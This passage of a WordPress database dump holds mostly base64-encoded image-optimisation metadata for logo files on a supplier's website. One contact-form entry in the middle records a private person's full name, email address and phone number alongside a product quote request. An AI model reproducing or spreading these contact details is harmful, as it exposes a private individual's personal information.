Tg4NTUxLTIyNXg5OS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2OTg4NTUxLTIyNXg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tbG9nby1lMTQ3MzE4Njk4ODU1MS0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MDMyLCJpZCI6MTI2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2OTg4NTUxLTExNHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tbG9nby1lMTQ3MzE4Njk4ODU1MS0xMTR4OTkuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tbG9nby1lMTQ3MzE4Njk4ODU1MS0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0ODIsInRpbWUiOjE0ODM1NzQwMzQsImlkIjoxMjYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWxvZ28tZTE0NzMxODY5ODg1NTEtMTYweDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2OTg4NTUxLTE2MHg5OS5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1sb2dvLWUxNDczMTg2OTg4NTUxLTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjYzMywidGltZSI6MTQ4MzU3NDAzNiwiaWQiOjEyNjF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29643, 1259, 'wpfc_optimisation_reduction', '1922'); 
INSERT INTO `wp_postmeta` VALUES (29644, 1259, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvZXh0cmVtZS1lMTQ3MzE4Njc3Mjk5OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTkuanBnIiwid2lkdGgiOjI0MCwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTkuanBnIiwicmVkdWN0aW9uIjo3ODEsInRpbWUiOjE0ODM1NzQwNDIsImlkIjoiMTI1OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvZXh0cmVtZS1lMTQ3MzE4Njc3Mjk5OS0yMDB4OTkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHVvcm9leHRyZW1lLWUxNDczMTg2NzcyOTk5LTIwMHg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHVvcm9leHRyZW1lLWUxNDczMTg2NzcyOTk5LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQwNDQsImlkIjoxMjU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTktMjI1eDk5LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1b3JvZXh0cmVtZS1lMTQ3MzE4Njc3Mjk5OS0yMjV4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmx1b3JvZXh0cmVtZS1lMTQ3MzE4Njc3Mjk5OS0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjozNywidGltZSI6MTQ4MzU3NDA0NiwiaWQiOjEyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHVvcm9leHRyZW1lLWUxNDczMTg2NzcyOTk5LTExNHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHVvcm9leHRyZW1lLWUxNDczMTg2NzcyOTk5LTExNHg5OS5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTktMTE0eDk5LmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTc0MDQ4LCJpZCI6MTI1OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTktMTYweDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdW9yb2V4dHJlbWUtZTE0NzMxODY3NzI5OTktMTYweDk5LmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiOTkiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZmx1b3JvZXh0cmVtZS1lMTQ3MzE4Njc3Mjk5OS0xNjB4OTkuanBnIiwicmVkdWN0aW9uIjo2MTAsInRpbWUiOjE0ODM1NzQwNTAsImlkIjoxMjU5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29645, 1257, 'wpfc_optimisation_reduction', '1655'); 
INSERT INTO `wp_postmeta` VALUES (29646, 1257, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tZTE0NzMxODY0NTM5MjguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tbG9nby1lMTQ3MzE4NjQ1MzkyOC5qcGciLCJ3aWR0aCI6MjQwLCJoZWlnaHQiOjk5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tZTE0NzMxODY0NTM5MjguanBnIiwicmVkdWN0aW9uIjo4MTUsInRpbWUiOjE0ODM1NzQwNTcsImlkIjoiMTI1NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tZTE0NzMxODY0NTM5MjgtMjAweDk5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tZTE0NzMxODY0NTM5MjgtMjAweDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQwNTksImlkIjoxMjU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTIyNXg5OS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTIyNXg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tbG9nby1lMTQ3MzE4NjQ1MzkyOC0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MDYxLCJpZCI6MTI1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTExNHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tbG9nby1lMTQ3MzE4NjQ1MzkyOC0xMTR4OTkuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tbG9nby1lMTQ3MzE4NjQ1MzkyOC0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjoyOTgsInRpbWUiOjE0ODM1NzQwNjMsImlkIjoxMjU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLWxvZ28tZTE0NzMxODY0NTM5MjgtMTYweDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTE2MHg5OS5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1sb2dvLWUxNDczMTg2NDUzOTI4LTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjU0MCwidGltZSI6MTQ4MzU3NDA2NSwiaWQiOjEyNTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29647, 1255, 'wpfc_optimisation_reduction', '1789'); 
INSERT INTO `wp_postmeta` VALUES (29648, 1255, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LmpwZyIsIndpZHRoIjoyNDAsImhlaWdodCI6OTksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WYXpvLWxvZ28tZTE0NzMxODYyMTE2NDguanBnIiwicmVkdWN0aW9uIjo3ODEsInRpbWUiOjE0ODM1NzQwNzMsImlkIjoiMTI1NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LTIwMHg5OS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby1lMTQ3MzE4NjIxMTY0OC0yMDB4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQwNzUsImlkIjoxMjU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby1lMTQ3MzE4NjIxMTY0OC0yMjV4OTkuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tZTE0NzMxODYyMTE2NDgtMjI1eDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby1lMTQ3MzE4NjIxMTY0OC0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MDc3LCJpZCI6MTI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Zhem8tbG9nby1lMTQ3MzE4NjIxMTY0OC0xMTR4OTkuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LTExNHg5OS5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Zhem8tbG9nby1lMTQ3MzE4NjIxMTY0OC0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0MTQsInRpbWUiOjE0ODM1NzQwNzksImlkIjoxMjU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LTE2MHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WYXpvLWxvZ28tZTE0NzMxODYyMTE2NDgtMTYweDk5LmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiOTkiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVmF6by1sb2dvLWUxNDczMTg2MjExNjQ4LTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjU5MiwidGltZSI6MTQ4MzU3NDA4MSwiaWQiOjEyNTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29649, 1253, 'wpfc_optimisation_reduction', '1825'); 
INSERT INTO `wp_postmeta` VALUES (29650, 1253, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LmpwZyIsIndpZHRoIjoyNDAsImhlaWdodCI6OTksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaGllbGRzeXMtZTE0NzMxODU5MjQ1NTcuanBnIiwicmVkdWN0aW9uIjo3OTUsInRpbWUiOjE0ODM1NzQwODcsImlkIjoiMTI1MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LTIwMHg5OS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy1lMTQ3MzE4NTkyNDU1Ny0yMDB4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQwODksImlkIjoxMjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy1lMTQ3MzE4NTkyNDU1Ny0yMjV4OTkuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtZTE0NzMxODU5MjQ1NTctMjI1eDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NoaWVsZHN5cy1lMTQ3MzE4NTkyNDU1Ny0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MDkxLCJpZCI6MTI1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NoaWVsZHN5cy1lMTQ3MzE4NTkyNDU1Ny0xMTR4OTkuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LTExNHg5OS5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NoaWVsZHN5cy1lMTQ3MzE4NTkyNDU1Ny0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0MzIsInRpbWUiOjE0ODM1NzQwOTMsImlkIjoxMjUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LTE2MHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaGllbGRzeXMtZTE0NzMxODU5MjQ1NTctMTYweDk5LmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiOTkiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2hpZWxkc3lzLWUxNDczMTg1OTI0NTU3LTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjU5NiwidGltZSI6MTQ4MzU3NDA5NSwiaWQiOjEyNTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29651, 3395, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (29652, 3395, '_seq_num', '205'); 
INSERT INTO `wp_postmeta` VALUES (29653, 3395, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (29654, 3395, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (29655, 3395, '_field_1', 'sasha cai lesher-perez'); 
INSERT INTO `wp_postmeta` VALUES (29656, 3395, '_field_10', 'UCLA'); 
INSERT INTO `wp_postmeta` VALUES (29657, 3395, '_field_2', 'sashacailp@g.ucla.edu'); 
INSERT INTO `wp_postmeta` VALUES (29658, 3395, '_field_8', '3107942248'); 
INSERT INTO `wp_postmeta` VALUES (29659, 3395, '_field_3', 'Hello, \r\nI am interested in purchasing Krytox FSL 157. Could you please send me a quote. I am currently unable to see the quantities sold or click on pricing options. If you could send me a quote with the different sizes available. Also, would it be possible to receive a small sample of Krytox FSL 157 to test out before purchasing larger quantities? \r\n\r\nThanks so much\r\nSasha Cai'); 
INSERT INTO `wp_postmeta` VALUES (29660, 3395, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (29661, 3395, '_sub_id', '3395'); 
INSERT INTO `wp_postmeta` VALUES (29662, 1249, 'wpfc_optimisation_reduction', '1855'); 
INSERT INTO `wp_postmeta` VALUES (29663, 1249, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZTE0NzMxODQ5MDYxNDEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1lMTQ3MzE4NDkwNjE0MS5qcGciLCJ3aWR0aCI6MjQwLCJoZWlnaHQiOjk5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZTE0NzMxODQ5MDYxNDEuanBnIiwicmVkdWN0aW9uIjo4MDAsInRpbWUiOjE0ODM1NzQxMDIsImlkIjoiMTI0OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50